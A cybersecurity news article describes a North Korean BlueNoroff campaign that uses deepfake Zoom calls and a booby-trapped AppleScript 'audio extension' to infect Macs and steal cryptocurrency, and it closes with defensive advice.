A North Korean hacker group known as BlueNoroff has pulled off a new kind of cyberattack that blends social engineering, deepfake technology, and malware to target Mac users. This group, already linked to several cryptocurrency-related attacks in the past, has now used fake Zoom calls and artificial intelligence-generated videos to trick their victims into downloading malware onto their devices.
The attack begins when the hackers approach their target through a messaging platform like Telegram. They pose as business professionals, often pretending to represent venture capital firms or well-known tech companies. To build trust, they send a meeting invitation using a scheduling service like Calendly. The invite claims the meeting will be on Google Meet, but the link actually takes the victim to a fake Zoom page controlled by the hackers.
Once the user joins the meeting, things appear surprisingly normal. The attackers play videos of people who seem like real company executives. These videos are actually deepfakes, AI-generated recordings made to look and sound like actual people. This makes the entire setup look professional and convincing. During the call, the hackers pretend that the victim’s microphone isn’t working properly and ask them to install a Zoom “audio support extension.”
That “extension” is where the real danger begins. The file is an AppleScript (.scpt file) that appears harmless and even shows an official Zoom SDK page. But beneath thousands of blank lines is code that secretly downloads and installs malware. It also checks whether Rosetta 2, a system component needed for running some Mac apps, is installed. If it’s missing, the script installs it quietly in the background, making the malware compatible with newer Mac systems.
Once the malware is fully installed, it can do a lot of damage. Security experts have identified at least eight different malicious tools used in this attack. One tool logs every key the victim types, another takes screenshots, and a third watches what is copied to the clipboard. There’s also a tool specifically made to steal login data from more than 20 popular cryptocurrency wallets. Other malware modules allow the attackers to maintain access to the system and remotely control it without being noticed.
This method of attack is extremely dangerous because of how realistic and personal it feels. It’s no longer just a suspicious email or a strange file attachment. The victim is invited to a video call, sees what looks like a real person on camera, and is walked through the process step by step. By using deepfakes and real-time interaction, the hackers make it much harder for people to recognize the scam.
The goal of the attackers seems clear: steal valuable information and, more importantly, money from cryptocurrency users or businesses. BlueNoroff is known for being financially motivated and has been linked to other advanced attacks targeting banks, fintech companies, and crypto exchanges around the world. This new method shows they are getting even more creative and dangerous.
To protect yourself, never download or run scripts or software during a video call, even if the person on the call appears trustworthy. Always verify meeting invitations and software requests through a second method, such as emailing the person directly or contacting your IT department. Also, keep your Mac’s security tools up to date and stay informed about new forms of online threats.
This incident is a wake-up call for individuals and companies alike. The use of AI-generated deepfakes in real-time video meetings marks a new level of cybercrime. It’s a reminder that in today’s digital world, seeing isn’t always believing.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
